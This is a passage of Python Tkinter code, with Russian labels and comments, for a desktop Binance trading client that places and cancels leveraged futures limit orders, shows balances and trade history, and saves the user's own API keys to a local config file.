k3_s = "%.5f" % (k3_f)
elif 0.000001 <= float(orLSS) < 0.00001:
k3_s = "%.6f" % (k3_f)
elif 0.0000001 <= float(orLSS) < 0.000001:
k3_s = "%.7f" % (k3_f)
elif float(orLSS) < 0.0000001:
k3_s = "%.8f" % (k3_f)
#print(k3_s)
if k1_f > 0 and k2_f > 0:
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='BUY', positionSide='LONG', type='LIMIT', timeInForce='GTC', quantity=k3_s, price=k1_f, newOrderRespType='FULL')
sys_msg = ' Ордер на покупку ' + grSmb + ' в LONG по цене ' + str(k1_f) + ' USDT в количестве ' + str(k3_s) + ' актива установлен.'
sys_msg += ' Маржа ' + str(k2_f) +' USDT, сумма ордера ' + str(k3_f*k1_f) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
#______________BUTTON NwOL_CLICK END (New Order Long) - SET NEW LONG FUTURES ORDER
#______________BUTTON NwOL_CLICK BEGIN (New Order Short) - SET NEW SHORT FUTURES ORDER
def click_buttonNwOS():
if MS == 'FUTURES':
k1_f = float(app.text_POrd.get(1.0,'end'))
k1_s = app.text_POrd.get(1.0,'end')
k2_f = float(app.text_QOrd.get(1.0,'end'))
k2_s = app.text_QOrd.get(1.0,'end')
k3_f=(k2_f*int(Lvrg))/k1_f
#print(k3_f)
if float(orLSS) >= 1:
k3_s = int(k3_f)
elif 1> float(orLSS) >= 0.1:
k3_s = "%.1f" % (k3_f)
elif 0.1 > float(orLSS) >= 0.01:
k3_s = "%.2f" % (k3_f)
elif 0.01 > float(orLSS) >= 0.001:
k3_s = "%.3f" % (k3_f)
elif 0.001 > float(orLSS) >= 0.0001:
k3_s = "%.4f" % (k3_f)
elif 0.00001 <= float(orLSS) < 0.0001:
k3_s = "%.5f" % (k3_f)
elif 0.000001 <= float(orLSS) < 0.00001:
k3_s = "%.6f" % (k3_f)
elif 0.0000001 <= float(orLSS) < 0.000001:
k3_s = "%.7f" % (k3_f)
elif float(orLSS) < 0.0000001:
k3_s = "%.8f" % (k3_f)
if k1_f > 0 and k2_f > 0:
bot.futuresCreateOrder(symbol=grSmb, recvWindow=5000, side='SELL', positionSide='SHORT', type='LIMIT', timeInForce='GTC', quantity=k3_s, price=k1_f, newOrderRespType='FULL')
sys_msg = ' Ордер на покупку ' + grSmb + ' в SHORT по цене ' + str(k1_f) + ' USDT в количестве ' + str(k3_s) + ' актива установлен.'
sys_msg += ' Маржа ' + str(k2_f) +' USDT, сумма ордера ' + str(k3_f*k1_f) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
#______________BUTTON NwOL_CLICK END (New Order Short) - SET NEW SHORT FUTURES ORDER
#______________BUTTON NwODel_CLICK BEGIN (New Order Delete) - DELETE NEW LONG/SHORT FUTURES ORDER
def click_buttonNwODel():
#print('delete order')
if should_run_C == True and MS=='FUTURES' and PosSide=='LONG':
BnFAcc=bot.userOpenOrders(symbol=grSmb)
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['type'])=='LIMIT' and str(BnFAcc1['positionSide'])=='LONG':
#print(BnFAcc1)
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Позиция LONG Ордер LIMIT удалён [' + grSmb + '], Цена: ' + str(BnFAcc1['price']) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
if should_run_C == True and MS=='FUTURES' and PosSide=='SHORT':
BnFAcc=bot.userOpenOrders(symbol=grSmb)
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['type'])=='LIMIT' and str(BnFAcc1['positionSide'])=='SHORT':
#print(BnFAcc1)
#print(BnFAcc1['clientOrderId'], ' , ',BnFAcc1['orderId'])
bot.futuresCancelOrder(symbol=grSmb,orderId=BnFAcc1['orderId'])
sys_msg = ' Позиция SHORT Ордер LIMIT удалён [' + grSmb + '], Цена: ' + str(BnFAcc1['price']) + ' USDT.'
app.Sys_Msg(text1=sys_msg)
#______________BUTTON NwOShow_CLICK BEGIN (New Order Show) - SHOW/HIDE NEW FUTURES ORDER
def click_buttonNwOShow():
global NwOrSw
if should_run_C == True and MS == 'FUTURES' and NwOrSw==False:
if PosSide == 'LONG':
k1=float(app.text_POrd.get(1.0,'end'))
k2=float(app.text_QOrd.get(1.0,'end'))
k3=(k2*float(Lvrg_Tmp))/k1
yyC =float(k1)-((float(k1)*(float(k3)/(float(Lvrg_Tmp)+1)))/float(k3))
yyC1 = grMd - (((k1+(k1-yyC))-y0I_TP)/(prSt*10))* grSt
yyC2 = grMd - ((k1-y0I_TP)/(prSt*10))* grSt
app.graph_Cn.coords(GOS_TP, 850,yyC1,880,yyC2)
#print(PosSide)
yyC1 = grMd - ((k1-y0I_TP)/(prSt*10))* grSt
yyC2 = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
app.graph_Cn.coords(GOS_SL, 850,yyC1,880,yyC2)
if PosSide == 'SHORT':
#print(PosSide)
k1=float(app.text_POrd.get(1.0,'end'))
k2=float(app.text_QOrd.get(1.0,'end'))
k3=(k2*float(Lvrg_Tmp))/k1
yyC =float(k1)+((float(k1)*(float(k3)/(float(Lvrg_Tmp)+1)))/float(k3))
yyC1 = grMd - (((k1+(k1-yyC))-y0I_TP)/(prSt*10))* grSt
yyC2 = grMd - ((k1-y0I_TP)/(prSt*10))* grSt
app.graph_Cn.coords(GOS_TP, 850,yyC1,880,yyC2)
yyC1 = grMd - ((k1-y0I_TP)/(prSt*10))* grSt
yyC2 = grMd - ((yyC-y0I_TP)/(prSt*10))* grSt
app.graph_Cn.coords(GOS_SL, 850,yyC1,880,yyC2)
NwOrSw=True
#print(NwOrSw)
app.button_NwOSw.config(text="Скрыть", fg='red')
elif should_run_C == True and MS == 'FUTURES' and NwOrSw==True:
NwOrSw=False
app.button_NwOSw.config(text="Просмотр", fg='black')
app.graph_Cn.coords(GOS_SL, 0,0,0,0)
app.graph_Cn.coords(GOS_TP, 0,0,0,0)
#______________BUTTON NwOShow_CLICK END (New Order Show) - SHOW/HIDE NEW FUTURES ORDER
#______________BUTTONS END
#______________MENU BEGIN
#______________MENU ACCOUNT_CLICK BEGIN - SHOW NEW WINDOW WITH BINANCE ACCOUNT KEYS
def clicked_Bnacc():
global rootAcc
global app_acc
rootAcc = Tk()
app_acc = AccWn(rootAcc)
rootAcc.title('Binance ключи')
rootAcc.geometry('550x120+150+100')
rootAcc.resizable(width=False, height=False)
rootAcc.mainloop()
#______________MENU ACCOUNT_CLICK END - SHOW NEW WINDOW WITH BINANCE ACCOUNT KEYS
#______________MENU ACCOUNT BUTTON SAVE CLICK BEGIN - SAVE KEYS
def click_button_AccSave():
global bot
global API_KEY_s
global API_SECRET_s
API_KEY_s = app_acc.text_AK.get(1.0,'end').replace("\n", "")
API_SECRET_s = app_acc.text_AS.get(1.0,'end').replace("\n", "")
if API_KEY_s != '' and API_SECRET_s != '':
bot = Binance(API_KEY=API_KEY_s, API_SECRET=API_SECRET_s)
my_file_Account = open("iTrader.cfg", "w")
sTmp = bot.API_KEY
sTmp += '\n'
sTmp += str(bot.API_SECRET, 'utf-8')
my_file_Account.write(sTmp)
my_file_Account.close()
messagebox.showinfo("Set account KEYs", "Данные успешно сохранены.")
rootAcc.destroy()
#______________MENU ACCOUNT BUTTON SAVE CLICK BEGIN - SAVE KEYS
#______________MENU BALANCES_CLICK BEGIN - SHOW NEW WINDOW WITH BALANCES
def clicked_blns():
rootBlns = Tk()
rootBlns.title('Binance balances')
rootBlns.geometry('800x850+150+100')
tab_control = ttk.Notebook(rootBlns)
tab1 = ttk.Frame(tab_control)
tab2 = ttk.Frame(tab_control)
tab3 = ttk.Frame(tab_control)
tab_control.add(tab1, text='SPOT')
lbl1 = Label(tab1, text='Вкладка 1',justify=LEFT)
lbl1.grid(column=0, row=0)
tab_control.add(tab2, text='FUTURES')
lbl2 = Label(tab2, text='Вкладка 2',justify=LEFT)
lbl2.grid(column=0, row=0)
tab_control.add(tab3, text='MARGIN')
tab_control.pack(expand=1, fill='both')
#__Заполнение Tab 1 - SPOT WALLETS
BnAcc = bot.account()
BnAcc1 = BnAcc.get('makerCommission')
sTmp = '\n 1. (makerCommission):' + str(BnAcc1)
BnAcc2 = BnAcc['takerCommission']
sTmp += '\n 2. takerCommission:' + str(BnAcc2)
BnAcc3 = BnAcc['buyerCommission']
sTmp += '\n 3. buyerCommission:' + str(BnAcc3)
BnAcc4 = BnAcc['sellerCommission']
sTmp += '\n 4. sellerCommission:' + str(BnAcc4)
BnAcc5 = BnAcc['canTrade']
sTmp += '\n 5. canTrade:' + str(BnAcc5)
BnAcc6 = BnAcc['canWithdraw']
sTmp += '\n 6. canWithdraw:' + str(BnAcc6)
BnAcc7 = BnAcc['canDeposit']
sTmp += '\n 7. canDeposit:' + str(BnAcc7)
BnAcc8 = BnAcc['updateTime']
sTmp += '\n 8. updateTime:' + str(BnAcc8)
BnAcc9 = BnAcc['accountType']
sTmp += '\n 9. accountType:' + str(BnAcc9)
BnAcc10 = BnAcc['balances']
sTmp += '\n 10. balances_len:' + str(len(BnAcc10))
BnAcc101=BnAcc10[0]
for mm in range(len(BnAcc10)):
BnAcc101 = BnAcc10[mm]
if float(BnAcc101['free']) > 0 or float(BnAcc101['locked']) > 0:
sTmp += '\n баланс: ' + str(BnAcc101['asset']) + ". Доступно: " + str(BnAcc101['free']) + ". Не доступно: " + str(BnAcc101['locked'])
BnAcc11 = BnAcc['permissions']
sTmp += "\n 11 permissions_len " + str(len(BnAcc11)) + 'permissions:'+ str(BnAcc11)
for mm in range(len(BnAcc11)):
if BnAcc11[mm] == 'SPOT':
sTmp += "\n 11 permissions_SPOT = TRUE (Спотовая торговля)"
if BnAcc11[mm] == 'LEVERAGED':
sTmp += "\n 11 permissions_LEVERAGED = TRUE (Маржинальная торговля?)"
lbl1.config(text = sTmp)
#__Заполнение Tab 2 - FUTURES WALLETS
sTmp = ''
BnFAcc = bot.futuresBalance()
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
sTmp += '\n баланс: ' + str(BnFAcc1['asset']) + ". Всего: " + str(BnFAcc1['balance']) + ". Доступно: " + str(BnFAcc1['withdrawAvailable'])
lbl2.config(text = sTmp)
rootBlns.mainloop()
#______________MENU BALANCES_CLICK END - SHOW NEW WINDOW WITH BALANCES
#______________MENU ORDERS_CLICK BEGIN - SHOW NEW WINDOW WITH ORDERS
def clicked_Ordrs():
rootBlns = Tk()
rootBlns.title('Binance orders')
rootBlns.geometry('800x850+150+100')
tab_control = ttk.Notebook(rootBlns)
tab1 = ttk.Frame(tab_control)
tab2 = ttk.Frame(tab_control)
tab3 = ttk.Frame(tab_control)
tab_control.add(tab1, text='SPOT Сделки')
lbl1 = Label(tab1, text='Вкладка 1',justify=LEFT)
lbl1.grid(column=0, row=0)
tab_control.add(tab2, text='SPOT Ордера')
lbl2 = Label(tab2, text='Вкладка 2',justify=LEFT)
lbl2.grid(column=0, row=0)
tab_control.add(tab3, text='FUTURES Сделки')
lbl3 = Label(tab3, text='Вкладка 3',justify=LEFT)
lbl3.grid(column=0, row=0)
tab_control.pack(expand=1, fill='both')
BnAcc = bot.account()
#Метод позволяет получить историю торгов авторизованного пользователя по указанной паре.
#Вес – 5.
#Параметры:
#Обязательные:
#symbol – пара
#timestamp – текущее время (в представленном коде проставляется автоматически, указывать не надо)
#Не обязательные:
#limit – кол-во возвращаемых сделок (максимум 500, по умолчанию 500)
#fromId – с какой сделки начинать вывод. По умолчанию выводятся самые последние.
#recvWindow – окно валидности запроса.
BnMt = bot.myTrades(symbol=grSmb)
#print (len(BnMt))
sTmp = 'BNBUSDT'
if len(BnMt)>0:
for mm in range(len(BnMt)):
BnMtM = BnMt[mm]
sTmp += '\n 1. ' + str(datetime.datetime.fromtimestamp(BnMtM['time']/1000))
if BnMtM['isBuyer'] == True:
sTmp += ' Покупка'
else:
sTmp += ' Продажа'
sTmp += '\n' + 'Цена:' + str(BnMtM['price']) + '. Кол-во:' + str(BnMtM['qty']) + '. Сумма:' + str(BnMtM['quoteQty'])
sTmp += '\n Комиссия:' + str(BnMtM['commissionAsset']) + ": "+ str(BnMtM['commission'])
lbl1.config(text = sTmp)
time_local_int = int(time.mktime(time.localtime()))
time_local_time = datetime.datetime.fromtimestamp(time_local_int)
time_local_str=time_local_time.strftime("%d.%m.%Y %H-%M-%S")
my_file_Trades = open(time_local_str + "_Trades.txt", "w")
my_file_PnL = open(time_local_str + "_PnL.txt", "w")
my_file_Cms = open(time_local_str + "_Cms.txt", "w")
my_file_AllTrades = open(time_local_str + "_AllTds.txt", "w")
BnMt = bot.userTrades(fromId=1,limit=1000)
#print(BnMt[0])
TTT=int((int(time.mktime(time.localtime()))-604800)*1000)
#print(int(time.mktime(time.localtime())))
sTmp = ''
sTmp_PnL = ''
sTmpF=''
sTmpF_PnL=''
sTmp_Cms = ''
sTmpF_Cms = ''
sTmp_AT = ''
sTmpF_AT = ''
while TTT < int(int(time.mktime(time.localtime()))*1000):
BnMt = bot.userTrades(startTime=TTT,limit=1000)
sTmp = ''
sTmp_PnL = ''
sTmp_Cms = ''
sTmp_AT = ''
for i in range(len(BnMt) - 1, -1, -1):
if i > 0 and float(BnMt[i]['realizedPnl']) != 0:
sTmp += '\n' + str(datetime.datetime.fromtimestamp(BnMt[i]['time']/1000)) + '\tid:' + str(BnMt[i]['id']) + '\ts:' + str(BnMt[i]['symbol'])
sTmp += '\t' + str(BnMt[i]['positionSide']) + '\tPNL: ' + str(BnMt[i]['realizedPnl'])
sTmp += '\t\t' + str(BnMt[i]['price']) + ' * ' + str(BnMt[i]['qty']) + ' = ' + str(BnMt[i]['quoteQty'])
sTmp_PnL += '\n' + str(datetime.datetime.fromtimestamp(BnMt[i]['time']/1000)) + '\t' + str(BnMt[i]['realizedPnl'])
elif i ==0:
sTmp += ''
if i > 0 and float(BnMt[i]['commission']) > 0:
sTmp_Cms += '\n' + str(datetime.datetime.fromtimestamp(BnMt[i]['time']/1000)) + '\t' + str(BnMt[i]['commission']) + '\t' + str(BnMt[i]['commissionAsset'])
if i > 0:
sTmp_AT += '\n' + str(BnMt[i])
sTmpF =sTmp + sTmpF
sTmpF_PnL = sTmp_PnL + sTmpF_PnL
sTmpF_Cms = sTmp_Cms + sTmpF_Cms
sTmpF_AT = sTmp_AT + sTmpF_AT
TTT +=604800000
my_file_Trades.write(sTmpF)
my_file_Trades.close()
my_file_PnL.write(sTmpF_PnL)
my_file_PnL.close()
my_file_Cms.write(sTmpF_Cms)
my_file_Cms.close()
my_file_AllTrades.write(sTmpF_AT)
my_file_AllTrades.close()
lbl3.config(text = sTmp)
rootBlns.mainloop()
#______________MENU ORDERS_CLICK END - SHOW NEW WINDOW WITH ORDERS
#______________MENU END
#______________ACCOUNT API KEYS WINDOW GUI BEGIN
class AccWn:
def __init__(self, window):
global API_KEY_sT
global API_SECRET_sT
self.label_AK = Label(rootAcc, text="API-Key: ", anchor=NW, justify=LEFT)
self.label_AK.place(height=30,width=70,x=1,y=10)
self.text_AK = Text(rootAcc)
self.text_AK.place(height=20,width=440,x=80,y=10)
self.label_AS = Label(rootAcc, text="API-Secret: ", anchor=NW, justify=LEFT)
self.label_AS.place(height=30,width=70,x=1,y=40)
self.text_AS = Text(rootAcc)
self.text_AS.place(height=20,width=440,x=80,y=40)
self.text_AK.insert(1.0, API_KEY_s)
self.text_AS.insert(1.0, API_SECRET_s)
self.Buttn_Acc_Sv = Button(rootAcc,text="Сохранить",fg='green', command=click_button_AccSave)
self.Buttn_Acc_Sv.place(height=30,width=100,x=10,y=80)
self.Buttn_Acc_Cl = Button(rootAcc,text="Закрыть",fg='black', command=rootAcc.destroy)
self.Buttn_Acc_Cl.place(height=30,width=100,x=440,y=80)
#______________ACCOUNT API KEYS WINDOW GUI END
#______________MAIN WINDOW GUI BEGIN
class gui:
def __init__(self, window):
global OrdSz
global PSDvar
#__Пустой label - просто фон
self.label_7 = Label(root, text="Это задний фон!", bg="white")
self.label_7.place(height=10,width=10,x=10,y=10)
#__third label - Graph must be here
self.label_Grpf = Label(root, text="Это график!", bg="lightgreen")
self.label_Grpf.place(height=500,width=510,x=10,y=150)
#__fourth label - Market orders must be here
self.label_Ord = Label(root, text="", bg="lightgreen")
self.label_Ord.place(height=500,width=150,x=410,y=150)
#______________LEFT TOP SIDE START
#__first label - balances, order size
self.label_BlnsSpt = Label(root, text="SPOT баланс = 0 USDT", anchor=NW, justify=LEFT)
self.label_BlnsSpt.place(height=50,width=190,x=10,y=10)
#__second label - search, TP, SL
self.label_2 = Label(root, text="FUTURES баланс = 0 USDT", anchor=NW, justify=LEFT)
self.label_2.place(height=50,width=190,x=10,y=60)
#__Order size
OrdSz = DoubleVar()
OrdSz.set(10)
self.OrdSz_5 = Radiobutton(text="5$", command=lambda i=5: self.OrdSz_Ch(i), variable=OrdSz, value=5,indicatoron=0)
self.OrdSz_10 = Radiobutton(text="10$", command=lambda i=10: self.OrdSz_Ch(i), variable=OrdSz, value=10,indicatoron=0)
self.OrdSz_15 = Radiobutton(text="15$", command=lambda i=15: self.OrdSz_Ch(i), variable=OrdSz, value=15,indicatoron=0)
self.OrdSz_20 = Radiobutton(text="20$", command=lambda i=20: self.OrdSz_Ch(i), variable=OrdSz, value=20,indicatoron=0)
self.OrdSz_25 = Radiobutton(text="25$", command=lambda i=25: self.OrdSz_Ch(i), variable=OrdSz, value=25,indicatoron=0)
self.OrdSz_30 = Radiobutton(text="30$", command=lambda i=30: self.OrdSz_Ch(i), variable=OrdSz, value=30,indicatoron=0)
self.OrdSz_05 = Radiobutton(text="5%", command=lambda i=0.05: self.OrdSz_Ch(i), variable=OrdSz, value=0.05,indicatoron=0)
self.OrdSz_010 = Radiobutton(text="10%", command=lambda i=0.10: self.OrdSz_Ch(i), variable=OrdSz, value=0.10,indicatoron=0)
self.OrdSz_025 = Radiobutton(text="25%", command=lambda i=0.25: self.OrdSz_Ch(i), variable=OrdSz, value=0.25,indicatoron=0)
self.OrdSz_050 = Radiobutton(text="50%", command=lambda i=0.50: self.OrdSz_Ch(i), variable=OrdSz, value=0.50,indicatoron=0)
self.OrdSz_075 = Radiobutton(text="75%", command=lambda i=0.75: self.OrdSz_Ch(i), variable=OrdSz, value=0.75,indicatoron=0)
self.OrdSz_090 = Radiobutton(text="90%", command=lambda i=0.90: self.OrdSz_Ch(i), variable=OrdSz, value=0.90,indicatoron=0)
self.OrdSz_5.place(height=15,width=30,x=10,y=115)
self.OrdSz_10.place(height=15,width=30,x=40,y=115)
self.OrdSz_15.place(height=15,width=30,x=70,y=115)
self.OrdSz_20.place(height=15,width=30,x=100,y=115)
self.OrdSz_25.place(height=15,width=30,x=130,y=115)
self.OrdSz_30.place(height=15,width=30,x=160,y=115)
self.OrdSz_05.place(height=15,width=30,x=10,y=130)
self.OrdSz_010.place(height=15,width=30,x=40,y=130)
self.OrdSz_025.place(height=15,width=30,x=70,y=130)
self.OrdSz_050.place(height=15,width=30,x=100,y=130)
self.OrdSz_075.place(height=15,width=30,x=130,y=130)
self.OrdSz_090.place(height=15,width=30,x=160,y=130)
#_______________LEFT TOP SIDE END
#_______________RIGHT TOP SIDE START
#__Label BTC/USDT watch - grow/fall
self.label_BU = Label(root, text="BTC/USDT +0 %", anchor=NW, justify=LEFT)
self.label_BU.place(height=40,width=200,x=510,y=10)
#__наблюдатель BTC/USDT start/stop button - start/stop timer
self.button_2 = Button(root, text="ВКЛ", command=click_button2)
self.button_2.place(height=40,width=50,x=460,y=10)
#__Label FUTURES Ords + PnL
self.label_PnL = Label(root, text="FUTURES позиции:\nPnL: +0 %", anchor=NW, justify=LEFT)
self.label_PnL.place(height=60,width=250,x=510,y=60)
#__Account balances start/stop button - start/stop timer
self.button_AB = Button(root, text="ВКЛ.", command=click_buttonAB)
self.button_AB.place(height=60,width=50,x=460,y=60)
#__Label FUTURES Hedge Mode
self.label_HM = Label(root, text="Hedge Mode: ", anchor=NW, justify=LEFT)
self.label_HM.place(height=40,width=250,x=460,y=130)
#_______________RIGHT TOP SIDE END
#_______________MIDDLE TOP SIDE START
self.Tree_Pos=ttk.Treeview(selectmode='none')
self.Tree_Pos['columns']=('Side','Symbol','Leverage','PnL','Price','markPrice','Liquid', 'Qty')
self.Tree_Pos.column("#0",width=0,stretch=NO)
self.Tree_Pos.column("Side",anchor=W,width=80)
self.Tree_Pos.column("Symbol",anchor=W,width=80)
self.Tree_Pos.column("Leverage",anchor=W,width=80)
self.Tree_Pos.column("PnL",anchor=W,width=80)
self.Tree_Pos.column("Price",anchor=W,width=80)
self.Tree_Pos.column("markPrice",anchor=W,width=80)
self.Tree_Pos.column("Liquid",anchor=W,width=80)
self.Tree_Pos.column("Qty",anchor=W,width=80)
self.Tree_Pos.heading("#0",text="",anchor=CENTER)
self.Tree_Pos.heading("Side",text="Позиция",anchor=CENTER)
self.Tree_Pos.heading("Symbol",text="Пара",anchor=CENTER)
self.Tree_Pos.heading("Leverage",text="Плечо",anchor=CENTER)
self.Tree_Pos.heading("PnL",text="PnL",anchor=CENTER)
self.Tree_Pos.heading("Price",text="Цена",anchor=CENTER)
self.Tree_Pos.heading("markPrice",text="МаркЦена",anchor=CENTER)
self.Tree_Pos.heading("Liquid",text="ЦенаЛиквид",anchor=CENTER)
self.Tree_Pos.heading("Qty",text="Кол-во",anchor=CENTER)
self.Tree_Pos.place(height=150,width=300,x=210,y=10)
self.Tree_Pos_VScrl = Scrollbar(root,command=self.Tree_Pos.yview)
self.Tree_Pos_VScrl.place(height=150,width=10,x=510,y=10)
self.Tree_Pos.config(yscrollcommand=self.Tree_Pos_VScrl.set)
#_______________MIDDLE TOP SIDE END
#_______________RIGHT SIDE START
# fith label - Buttons for my orders must be here
self.label_Cmd = Label(root, text="", bg="lightgray", justify=LEFT)
self.label_Cmd.place(height=500,width=100,x=510,y=150)
#__seventh label - symbol of pair here
self.label_P = Label(root, text="BNB/USDT", bg="lightgray", anchor=NW, justify=LEFT)
self.label_P.place(height=30,width=100,x=510,y=150)
self.CB_MrgT = Combobox(root,state="readonly")
self.CB_MrgT['values'] = ('NONE','ISOLATED', 'CROSSED')
self.CB_MrgT.current(0)
self.CB_MrgT.place(height=30,width=100,x=510,y=200)
self.CB_MrgT.bind('<<ComboboxSelected>>',self.CB_MrgT_changed)
self.CB_Lvrg = Combobox(root,state="readonly")
self.CB_Lvrg['values'] = ('1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20')
self.CB_Lvrg.current(0)
self.CB_Lvrg.place(height=30,width=40,x=620,y=200)
self.CB_Lvrg.bind('<<ComboboxSelected>>',self.CB_Lvrg_changed)
self.button_MrLvSet = Button(root, text="Сохр.", command=self.click_button_MrLvSet)
self.button_MrLvSet.place(height=30,width=50,x=660,y=200)
#__PAIR SELECT
self.CB_P = Combobox(root)
self.CB_P['values'] = ('BNBUSDT', 'BTCUSDT', 'ETHUSDT', 'WAVESUSDT', 'EOSUSDT')
self.CB_P.current(0)
self.CB_P.place(height=30,width=200,x=510,y=250)
self.CB_P.bind('<<ComboboxSelected>>',self.CB_P_changed)
MPSLvar=StringVar()
MPSL_list = ['SPOT', 'FUTURES', 'MARGIN']
MPSLvar.set(MPSL_list[0])
self.MPSL = OptionMenu(root,MPSLvar,*MPSL_list,command=self.market_selected)
self.MPSL.place(height=30,width=100,x=510,y=190)
SPSLvar=StringVar()
SPSL_list = ['Все', 'USDT']
SPSLvar.set(SPSL_list[1])
self.SPSL = OptionMenu(root,SPSLvar,*SPSL_list,command=self.pair_selected)
self.SPSL.place(height=30,width=100,x=610,y=190)
#__PAIR INFO LABEL TEMP
self.label_PI = Label(self.label_Cmd, text="Пара", anchor=NW, justify=LEFT)
self.label_PI.place(height=120,width=200,x=0,y=120)
self.Tree_PI=ttk.Treeview(self.label_Cmd,selectmode='none')
self.Tree_PI['columns']=('param','val')
self.Tree_PI.column("#0",width=0,stretch=NO)
self.Tree_PI.column("param",anchor=W,width=80)
self.Tree_PI.column("val",anchor=W,width=80)
self.Tree_PI.heading("#0",text="",anchor=CENTER)
self.Tree_PI.heading("param",text="Параметр",anchor=CENTER)
self.Tree_PI.heading("val",text="Значене",anchor=CENTER)
self.Tree_PI.place(height=120,width=185,x=0,y=120)
self.Tree_PI_VScrl = Scrollbar(self.label_Cmd,command=self.Tree_PI.yview)
self.Tree_PI_VScrl.place(height=150,width=10,x=510,y=10)
self.Tree_PI.config(yscrollcommand=self.Tree_PI_VScrl.set)
self.Tree_PI.insert(parent='',index='end',iid=1,text='',values='символ')
self.Tree_PI.insert(parent='',index='end',iid=2,text='',values='статус')
self.Tree_PI.insert(parent='',index='end',iid=3,text='',values='базовая')
self.Tree_PI.insert(parent='',index='end',iid=4,text='',values='котируемая')
self.Tree_PI.insert(parent='',index='end',iid=5,text='',values='маржа')
self.Tree_PI.insert(parent='',index='end',iid=6,text='',values='тип')
self.Tree_PI.insert(parent='',index='end',iid=7,text='',values='минЦена')
self.Tree_PI.insert(parent='',index='end',iid=8,text='',values='максЦена')
self.Tree_PI.insert(parent='',index='end',iid=9,text='',values='шагЦены')
self.Tree_PI.insert(parent='',index='end',iid=10,text='',values='максОбъем')
self.Tree_PI.insert(parent='',index='end',iid=11,text='',values='шагОрдера')
#_____________Orders START
#__Label - Заднее поле для работы с ордерами
self.label_CmdOrd = Label(self.label_Cmd, text="Новая позиция", bg="white", anchor=NW, justify=LEFT)
self.label_CmdOrd.place(height=300,width=200,x=0,y=350)
#__Label - Количество (Amaunt)
self.label_QOrd = Label(self.label_CmdOrd, text="Кол-во", anchor=NW, justify=LEFT)
self.label_QOrd.place(height=25,width=50,x=0,y=30)
#__TextBox - Количество (Amaunt)
self.text_QOrd = Text(self.label_CmdOrd)
self.text_QOrd.place(height=25,width=80,x=50,y=30)
self.text_QOrd.insert('end','5')
#__Label - Количество (Amaunt)
self.label_OrdAss = Label(self.label_CmdOrd, text="USDT x 20", bg="white", anchor=NW, justify=LEFT)
self.label_OrdAss.place(height=25,width=70,x=130,y=30)
#__Label - Цена
self.label_POrd = Label(self.label_CmdOrd, text="Цена", anchor=NW, justify=LEFT)
self.label_POrd.place(height=25,width=50,x=0,y=60)
#__TextBox - Цена
self.text_POrd = Text(self.label_CmdOrd)
self.text_POrd.place(height=25,width=80,x=50,y=60)
self.text_POrd.insert('end','10')
#__Label - Цена
self.label_PAss = Label(self.label_CmdOrd, text="USDT", bg="white", anchor=NW, justify=LEFT)
self.label_PAss.place(height=25,width=70,x=130,y=60)
#__new order LONG button - create order
self.button_NwOL = Button(self.label_CmdOrd, text="Новый Long", command=click_buttonNwOL)
self.button_NwOL.place(height=30,width=95,x=0,y=100)
#__new order LONG button - create order
self.button_NwOSh = Button(self.label_CmdOrd, text="Новый Short", command=click_buttonNwOS)
self.button_NwOSh.place(height=30,width=95,x=100,y=100)
#__temp new order show
self.button_NwOSw = Button(self.label_CmdOrd, text="Просмотр", command=click_buttonNwOShow)
self.button_NwOSw.place(height=30,width=95,x=0,y=150)
#__close opened orders
self.button_NwODel = Button(self.label_CmdOrd, text="Удалить",fg='red', command=click_buttonNwODel)
self.button_NwODel.place(height=30,width=95,x=100,y=150)
self.Tree_Ord=ttk.Treeview(self.label_CmdOrd,selectmode='browse')
self.Tree_Ord['columns']=('Pos','Side','Price','Qty','Type')
self.Tree_Ord.column("#0",width=0,stretch=NO)
self.Tree_Ord.column("Pos",anchor=W,width=20)
self.Tree_Ord.column("Side",anchor=W,width=20)
self.Tree_Ord.column("Price",anchor=W,width=20)
self.Tree_Ord.column("Qty",anchor=W,width=20)
self.Tree_Ord.column("Type",anchor=W,width=20)
self.Tree_Ord.heading("#0",text="",anchor=CENTER)
self.Tree_Ord.heading("Pos",text="Поз.",anchor=CENTER)
self.Tree_Ord.heading("Side",text="Напр.",anchor=CENTER)
self.Tree_Ord.heading("Price",text="Цена",anchor=CENTER)
self.Tree_Ord.heading("Qty",text="Кол-во",anchor=CENTER)
self.Tree_Ord.heading("Type",text="Тип",anchor=CENTER)
self.Tree_Ord.place(height=220,width=180,x=0,y=190)
self.Tree_Ord_VScrl = Scrollbar(self.label_CmdOrd,command=self.Tree_Ord.yview)
self.Tree_Ord_VScrl.place(height=220,width=10,x=180,y=190)
self.Tree_Ord.config(yscrollcommand=self.Tree_Ord_VScrl.set)
#_____________Orders END
#_______________RIGHT SIDE END
#_______________BOTTOM SIDE START
# Text box - System messages must be here
self.text_Sys = Text(root, wrap=WORD)
self.text_Sys.place(height=150,width=600,x=10,y=660)
self.text_Sys.insert('end','')
self.text_Sys_Scrl = Scrollbar(root,command=self.text_Sys.yview)
self.text_Sys_Scrl.place(height=150,width=10,x=600,y=660)
self.text_Sys.config(yscrollcommand=self.text_Sys_Scrl.set)
#_______________BOTTOM SIDE END
#_______________MIDDLE-EXTRA SIDE START
self.Scale_TP = Scale(root, from_=350,to=-100,resolution=0.1,bg='lightgreen',sliderlength = 15,command=self.Scale_TP_change)
self.Scale_TP.place(height=100,width=10,x=510,y=150)
self.Scale_SL = Scale(root,from_=350,to=-100,resolution=0.1,bg='lightpink',sliderlength = 15,command=self.Scale_SL_change)
self.Scale_SL.place(height=100,width=10,x=510,y=250)
self.button_PSL = Button(root, text="Сохр.",fg='red', command=self.click_button_PSL)
self.button_PSLR = Button(root, text="X",fg='red', command=self.click_button_PSLR)
self.button_PTP = Button(root, text="Сохр.",fg='green', command=self.click_button_PTP)
self.button_PTPR = Button(root, text="X",fg='green', command=self.click_button_PTPR)
PSDvar = StringVar()
